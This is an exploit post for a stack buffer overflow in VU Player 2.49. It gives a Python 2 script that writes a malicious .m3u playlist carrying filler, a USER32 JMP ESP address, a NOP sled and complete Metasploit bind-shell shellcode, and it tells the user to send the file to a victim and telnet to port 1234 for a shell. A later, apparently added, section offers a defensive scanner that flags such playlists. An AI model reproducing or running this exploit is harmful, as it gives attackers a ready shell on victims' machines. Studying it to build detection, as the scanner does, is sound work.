This is a VU Player stack buffer overflow exploit. It is a local exploit.
When you run this exploit a malformed .m3u file will be generated.
Change the shellcode according to your purpose.
The shellcode I have added is a bad-character-free windows/shell/bind_tcp payload generated from the Metasploit Framework.
If you use this shellcode, after the victim opens the malformed .m3u you just have to telnet to the victim on port 1234 to get a shell.
I have submitted the code @ injector vulnerability database.
You can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category:: Local
# Tested on: Windows XP SP2.

#!/usr/bin/python
# Python 2 script: print statements and str-based file writes are intentional.
from struct import pack

print "######################################################"
print "##         VU Player Local BO Exploit               ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##         Author :: Debasish Mandal                ##"
print "##         Email : debasishm89@gmail.com            ##"
print "##      http://www.facebook.com/raza.whitehat       ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")

f = open('victim.m3u','w')
junk = "A"*1012                         # filler up to the saved return address
eip = pack('<L',0x77D7754A)             # JMP ESP @ USER32.dll
nop = "\x90" *10                        # NOPs [To make the exploit smooth]

# Shell Code Starts Here
# List of bad characters: \x00 \x09 \x0a \x1a
# Generated from Metasploit Framework
# Name : windows/shell/bind_tcp
# LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")

payload = (junk+eip+nop+shellcode)
print "[*]Writing payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"
# 1337day.com [2011-08-22
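The payload above has a shape no legitimate playlist entry has: one line of roughly a kilobyte of filler, a 4-byte return address, and a run of 0x90 NOP bytes. The following Python 3 scanner is an added example written from the detection side; it is not part of the original exploit post. It flags playlist entries that exceed a length threshold, contain a NOP run, or contain control bytes. The 260-byte threshold (Windows MAX_PATH), the four-byte sled minimum and both sample inputs are assumptions constructed for this example; the crafted sample reproduces only the filler, address and NOP layout, with no shellcode.

```python
"""Heuristic scanner for crafted .m3u playlists (added example, not from the
original post).  It looks for the three properties the overflow payload has:
an entry far longer than any real path, a run of 0x90 bytes, and control bytes
inside what should be a text line."""

MAX_ENTRY_LEN = 260   # assumption: MAX_PATH on Windows; real entries are shorter
NOP_SLED_MIN = 4      # assumption: this many consecutive 0x90 bytes counts as a sled


def scan_m3u(data: bytes):
    """Return a list of (line_number, reason) findings for raw playlist bytes."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives are fine
        if len(line) > MAX_ENTRY_LEN:
            findings.append((lineno, "entry length %d exceeds %d"
                             % (len(line), MAX_ENTRY_LEN)))
        if b"\x90" * NOP_SLED_MIN in line:
            findings.append((lineno, "possible NOP sled (0x90 run)"))
        # Control bytes other than TAB never belong in a path; bytes >= 0x80
        # are left alone because UTF-8 paths are legitimate in playlists.
        if any(b < 0x20 and b != 0x09 for b in line):
            findings.append((lineno, "control bytes in playlist entry"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if the scanner produced at least one finding."""
    return bool(scan_m3u(data))


# Constructed samples (not real files): a benign playlist, and one shaped like
# the overflow above, filler + fake return address + NOP sled, no shellcode.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Song\r\nC:\\Music\\song.mp3\r\n"
CRAFTED = b"A" * 1012 + b"\x4a\x75\xd7\x77" + b"\x90" * 10 + b"\xcc" * 8

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, scan_m3u(sample))
```

Run it over a real playlist with `scan_m3u(open(path, "rb").read())`; the benign sample yields no findings, while the crafted sample is reported twice on line 1 (length and NOP run). The length check alone is enough to catch this particular payload, since the filler has to reach the saved return address at 1012 bytes regardless of what follows it.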